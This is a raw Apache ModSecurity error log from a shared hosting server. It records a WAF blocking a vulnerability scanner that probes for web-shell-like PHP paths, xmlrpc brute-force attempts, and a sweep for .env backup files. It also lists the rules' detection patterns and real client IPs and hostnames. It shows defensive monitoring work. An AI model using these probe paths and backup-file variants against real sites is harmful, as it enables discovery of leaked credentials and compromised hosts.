[Tue May 26 14:33:34.874798 2026] [security2:error] [pid 626747:tid 627003] [client 4.204.220.190:12457] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.bramas.in"] [uri "/mac.php"] [unique_id "ahVh5hVF8Qmdmw_OMfLgXgAAAYg"]
[Tue May 26 14:33:34.961951 2026] [security2:error] [pid 626747:tid 626973] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVh5hVF8Qmdmw_OMfLgVgAAAWo"]
[Tue May 26 14:33:35.077640 2026] [security2:error] [pid 626747:tid 626905] [client 4.204.220.190:21378] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.bramas.in"] [uri "/25d653587fdfd1.php"] [unique_id "ahVh5xVF8Qmdmw_OMfLgYgAAASY"]
[Tue May 26 14:33:35.077782 2026] [security2:error] [pid 626747:tid 626905] [client 4.204.220.190:21378] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.bramas.in"] [uri "/25d653587fdfd1.php"] [unique_id "ahVh5xVF8Qmdmw_OMfLgYgAAASY"]
[Tue May 26 14:33:35.263516 2026] [security2:error] [pid 626747:tid 626915] [client 4.204.220.190:12451] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.bramas.in"] [uri "/wefile.php"] [unique_id "ahVh5xVF8Qmdmw_OMfLgbQAAATA"]
[Tue May 26 14:33:35.263638 2026] [security2:error] [pid 626747:tid 626915] [client 4.204.220.190:12451] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.bramas.in"] [uri "/wefile.php"] [unique_id "ahVh5xVF8Qmdmw_OMfLgbQAAATA"]
[Tue May 26 14:33:36.591347 2026] [security2:error] [pid 626747:tid 626963] [client 162.158.94.19:9561] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "blettclms.com"] [uri "/wp-admin/install.php"] [unique_id "ahVh6BVF8Qmdmw_OMfLgigAAAWA"]
[Tue May 26 14:33:36.810949 2026] [security2:error] [pid 626747:tid 626910] [client 4.204.220.190:65382] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.bramas.in"] [uri "/casp3.php"] [unique_id "ahVh6BVF8Qmdmw_OMfLgpQAAASs"]
[Tue May 26 14:33:36.811777 2026] [security2:error] [pid 626747:tid 626910] [client 4.204.220.190:65382] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.bramas.in"] [uri "/casp3.php"] [unique_id "ahVh6BVF8Qmdmw_OMfLgpQAAASs"]
[Tue May 26 14:33:37.148269 2026] [security2:error] [pid 626747:tid 626903] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVh6BVF8Qmdmw_OMfLgngAAASQ"]
[Tue May 26 14:33:37.153364 2026] [proxy:error] [pid 626747:tid 626896] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:33:37.153425 2026] [proxy_http:error] [pid 626747:tid 626896] [client 4.204.220.190:21635] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:33:37.153997 2026] [proxy:error] [pid 626747:tid 626896] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:33:37.154028 2026] [proxy_http:error] [pid 626747:tid 626896] [client 4.204.220.190:21635] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:33:37.154098 2026] [security2:error] [pid 626747:tid 626896] [client 4.204.220.190:21635] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "503"] [hostname "cpcontacts.bramas.in"] [uri "/___proxy_subdomain_cpcontacts/cgi-sys/503.html"] [unique_id "ahVh6RVF8Qmdmw_OMfLgtAAAAR0"]
[Tue May 26 14:33:37.163912 2026] [security2:error] [pid 626747:tid 626964] [client 202.141.83.254:19851] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVh6RVF8Qmdmw_OMfLgtQAAAWE"]
[Tue May 26 14:33:37.164520 2026] [security2:error] [pid 626747:tid 626964] [client 202.141.83.254:19851] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVh6RVF8Qmdmw_OMfLgtQAAAWE"]
[Tue May 26 14:33:37.400811 2026] [proxy:error] [pid 626747:tid 626889] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:33:37.400899 2026] [proxy_http:error] [pid 626747:tid 626889] [client 4.204.220.190:38648] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:33:37.401483 2026] [proxy:error] [pid 626747:tid 626889] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:33:37.401514 2026] [proxy_http:error] [pid 626747:tid 626889] [client 4.204.220.190:38648] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:33:37.401610 2026] [security2:error] [pid 626747:tid 626889] [client 4.204.220.190:38648] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "503"] [hostname "cpcontacts.bramas.in"] [uri "/___proxy_subdomain_cpcontacts/cgi-sys/503.html"] [unique_id "ahVh6RVF8Qmdmw_OMfLgtgAAARY"]
[Tue May 26 14:33:37.718712 2026] [security2:error] [pid 626747:tid 626949] [client 4.204.220.190:21634] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.bramas.in"] [uri "/wp-admin/css/colour.php"] [unique_id "ahVh6RVF8Qmdmw_OMfLgwAAAAVI"]
[Tue May 26 14:33:37.718831 2026] [security2:error] [pid 626747:tid 626949] [client 4.204.220.190:21634] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.bramas.in"] [uri "/wp-admin/css/colour.php"] [unique_id "ahVh6RVF8Qmdmw_OMfLgwAAAAVI"]
[Tue May 26 14:33:37.794349 2026] [security2:error] [pid 626747:tid 626877] [client 162.158.94.18:9761] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "blettclms.com"] [uri "/index.php/wp-admin/install.php"] [unique_id "ahVh6RVF8Qmdmw_OMfLgrAABCnk"]
[Tue May 26 14:33:38.024236 2026] [security2:error] [pid 626747:tid 626939] [client 4.204.220.190:38595] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.bramas.in"] [uri "/half.php"] [unique_id "ahVh6hVF8Qmdmw_OMfLgywAAAUg"]
[Tue May 26 14:33:38.024340 2026] [security2:error] [pid 626747:tid 626939] [client 4.204.220.190:38595] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.bramas.in"] [uri "/half.php"] [unique_id "ahVh6hVF8Qmdmw_OMfLgywAAAUg"]
[Tue May 26 14:33:38.293982 2026] [security2:error] [pid 626747:tid 626931] [client 4.204.220.190:38602] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.bramas.in"] [uri "/2P.php"] [unique_id "ahVh6hVF8Qmdmw_OMfLg1gAAAUA"]
[Tue May 26 14:33:38.294115 2026] [security2:error] [pid 626747:tid 626931] [client 4.204.220.190:38602] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.bramas.in"] [uri "/2P.php"] [unique_id "ahVh6hVF8Qmdmw_OMfLg1gAAAUA"]
[Tue May 26 14:33:38.541455 2026] [security2:error] [pid 626747:tid 626953] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVh6hVF8Qmdmw_OMfLg0QAAAVY"]
[Tue May 26 14:33:38.567399 2026] [security2:error] [pid 626747:tid 626975] [client 4.204.220.190:21406] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.bramas.in"] [uri "/tires.php"] [unique_id "ahVh6hVF8Qmdmw_OMfLg2gAAAWw"]
[Tue May 26 14:33:38.567542 2026] [security2:error] [pid 626747:tid 626975] [client 4.204.220.190:21406] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.bramas.in"] [uri "/tires.php"] [unique_id "ahVh6hVF8Qmdmw_OMfLg2gAAAWw"]
[Tue May 26 14:33:38.754114 2026] [proxy:error] [pid 626747:tid 626878] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:33:38.754175 2026] [proxy_http:error] [pid 626747:tid 626878] [client 4.204.220.190:12435] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:33:38.754816 2026] [proxy:error] [pid 626747:tid 626878] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:33:38.754850 2026] [proxy_http:error] [pid 626747:tid 626878] [client 4.204.220.190:12435] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:33:38.754949 2026] [security2:error] [pid 626747:tid 626878] [client 4.204.220.190:12435] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "503"] [hostname "cpcontacts.bramas.in"] [uri "/___proxy_subdomain_cpcontacts/cgi-sys/503.html"] [unique_id "ahVh6hVF8Qmdmw_OMfLg4gAAAQs"]
[Tue May 26 14:33:39.359209 2026] [security2:error] [pid 626747:tid 626982] [client 4.204.220.190:21308] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.bramas.in"] [uri "/like.php"] [unique_id "ahVh6xVF8Qmdmw_OMfLg7wAAAXM"]
[Tue May 26 14:33:39.359311 2026] [security2:error] [pid 626747:tid 626982] [client 4.204.220.190:21308] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.bramas.in"] [uri "/like.php"] [unique_id "ahVh6xVF8Qmdmw_OMfLg7wAAAXM"]
[Tue May 26 14:33:39.925888 2026] [security2:error] [pid 626747:tid 626987] [client 154.161.32.97:46544] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.32.161.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVh6xVF8Qmdmw_OMfLg-gAAAXg"]
[Tue May 26 14:33:39.926105 2026] [security2:error] [pid 626747:tid 626987] [client 154.161.32.97:46544] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVh6xVF8Qmdmw_OMfLg-gAAAXg"]
[Tue May 26 14:33:40.156906 2026] [security2:error] [pid 626747:tid 626936] [client 208.84.100.165:49226] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "www.cbslp.edu.mx.md-74.webhostbox.net"] [uri "/.env.production.copy"] [unique_id "ahVh7BVF8Qmdmw_OMfLhAQAAAUU"]
[Tue May 26 14:33:40.439560 2026] [security2:error] [pid 626747:tid 626939] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVh7BVF8Qmdmw_OMfLhAAAAAUg"]
[Tue May 26 14:33:41.618471 2026] [core:crit] [pid 626747:tid 626883] (13)Permission denied: [client 66.249.70.137:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 14:33:42.527442 2026] [security2:error] [pid 626747:tid 626936] [client 4.204.220.190:35335] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.bramas.in"] [uri "/.well-known/about.php"] [unique_id "ahVh7hVF8Qmdmw_OMfLhOAAAAUU"]
[Tue May 26 14:33:42.527595 2026] [security2:error] [pid 626747:tid 626936] [client 4.204.220.190:35335] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.bramas.in"] [uri "/.well-known/about.php"] [unique_id "ahVh7hVF8Qmdmw_OMfLhOAAAAUU"]
[Tue May 26 14:33:43.150583 2026] [security2:error] [pid 626747:tid 626979] [client 4.204.220.190:21401] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.bramas.in"] [uri "/wp-includes/ID3/about.php"] [unique_id "ahVh7xVF8Qmdmw_OMfLhSgAAAXA"]
[Tue May 26 14:33:43.150705 2026] [security2:error] [pid 626747:tid 626979] [client 4.204.220.190:21401] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.bramas.in"] [uri "/wp-includes/ID3/about.php"] [unique_id "ahVh7xVF8Qmdmw_OMfLhSgAAAXA"]
[Tue May 26 14:33:43.232326 2026] [security2:error] [pid 626747:tid 626911] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVh7hVF8Qmdmw_OMfLhRQAAASw"]
[Tue May 26 14:33:44.045120 2026] [security2:error] [pid 626747:tid 626972] [client 208.84.100.165:49278] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.cbslp.edu.mx.md-74.webhostbox.net"] [uri "/.env.bak"] [unique_id "ahVh8BVF8Qmdmw_OMfLhXgAAAWk"]
[Tue May 26 14:33:44.046756 2026] [security2:error] [pid 626747:tid 627002] [client 208.84.100.165:49386] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.cbslp.edu.mx.md-74.webhostbox.net"] [uri "/.env.production.bak"] [unique_id "ahVh8BVF8Qmdmw_OMfLhXwAAAYc"]
[Tue May 26 14:33:44.047636 2026] [security2:error] [pid 626747:tid 626948] [client 208.84.100.165:49406] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.cbslp.edu.mx.md-74.webhostbox.net"] [uri "/.env.production.backup"] [unique_id "ahVh8BVF8Qmdmw_OMfLhYAAAAVE"]
[Tue May 26 14:33:44.048185 2026] [security2:error] [pid 626747:tid 626961] [client 208.84.100.165:49426] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.cbslp.edu.mx.md-74.webhostbox.net"] [uri "/.env.production~"] [unique_id "ahVh8BVF8Qmdmw_OMfLhYwAAAV4"]
[Tue May 26 14:33:44.048271 2026] [security2:error] [pid 626747:tid 626980] [client 208.84.100.165:49430] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "www.cbslp.edu.mx.md-74.webhostbox.net"] [uri "/.env.production.swp"] [unique_id "ahVh8BVF8Qmdmw_OMfLhYgAAAXE"]
[Tue May 26 14:33:44.048648 2026] [security2:error] [pid 626747:tid 626992] [client 208.84.100.165:49444] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "www.cbslp.edu.mx.md-74.webhostbox.net"] [uri "/.env.production.orig"] [unique_id "ahVh8BVF8Qmdmw_OMfLhZAAAAX0"]
[Tue May 26 14:33:44.052354 2026] [security2:error] [pid 626747:tid 626940] [client 208.84.100.165:49290] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.cbslp.edu.mx.md-74.webhostbox.net"] [uri "/.env.backup"] [unique_id "ahVh8BVF8Qmdmw_OMfLhbwAAAUk"]
[Tue May 26 14:33:44.052614 2026] [security2:error] [pid 626747:tid 626946] [client 208.84.100.165:49338] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "www.cbslp.edu.mx.md-74.webhostbox.net"] [uri "/.env.orig"] [unique_id "ahVh8BVF8Qmdmw_OMfLhbgAAAU8"]
[Tue May 26 14:33:44.052749 2026] [security2:error] [pid 626747:tid 626999] [client 208.84.100.165:49378] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "www.cbslp.edu.mx.md-74.webhostbox.net"] [uri "/.env.local.swp"] [unique_id "ahVh8BVF8Qmdmw_OMfLhcQAAAYQ"]
[Tue May 26 14:33:44.052757 2026] [security2:error] [pid 626747:tid 626918] [client 208.84.100.165:49394] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.cbslp.edu.mx.md-74.webhostbox.net"] [uri "/.env.production.old"] [unique_id "ahVh8BVF8Qmdmw_OMfLhZQAAATM"]
[Tue May 26 14:33:44.053619 2026] [security2:error] [pid 626747:tid 626900] [client 208.84.100.165:49282] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.cbslp.edu.mx.md-74.webhostbox.net"] [uri "/.env.old"] [unique_id "ahVh8BVF8Qmdmw_OMfLhZwAAASE"]
[Tue May 26 14:33:44.053991 2026] [security2:error] [pid 626747:tid 626958] [client 208.84.100.165:49312] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.cbslp.edu.mx.md-74.webhostbox.net"] [uri "/.env~"] [unique_id "ahVh8BVF8Qmdmw_OMfLhagAAAVs"]
[Tue May 26 14:33:44.054024 2026] [security2:error] [pid 626747:tid 626952] [client 208.84.100.165:49348] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "www.cbslp.edu.mx.md-74.webhostbox.net"] [uri "/.env.copy"] [unique_id "ahVh8BVF8Qmdmw_OMfLhaQAAAVU"]
[Tue May 26 14:33:44.054237 2026] [security2:error] [pid 626747:tid 626934] [client 208.84.100.165:49380] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "www.cbslp.edu.mx.md-74.webhostbox.net"] [uri "/.env.local.orig"] [unique_id "ahVh8BVF8Qmdmw_OMfLhcwAAAUM"]
[Tue May 26 14:33:44.054488 2026] [security2:error] [pid 626747:tid 626944] [client 208.84.100.165:49368] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.cbslp.edu.mx.md-74.webhostbox.net"] [uri "/.env.local~"] [unique_id "ahVh8BVF8Qmdmw_OMfLhcgAAAU0"]
[Tue May 26 14:33:44.056844 2026] [security2:error] [pid 626747:tid 626928] [client 208.84.100.165:49350] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.cbslp.edu.mx.md-74.webhostbox.net"] [uri "/.env.local.bak"] [unique_id "ahVh8BVF8Qmdmw_OMfLhdgAAAT0"]
[Tue May 26 14:33:44.057007 2026] [security2:error] [pid 626747:tid 626995] [client 208.84.100.165:49384] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "www.cbslp.edu.mx.md-74.webhostbox.net"] [uri "/.env.local.copy"] [unique_id "ahVh8BVF8Qmdmw_OMfLhdQAAAYA"]
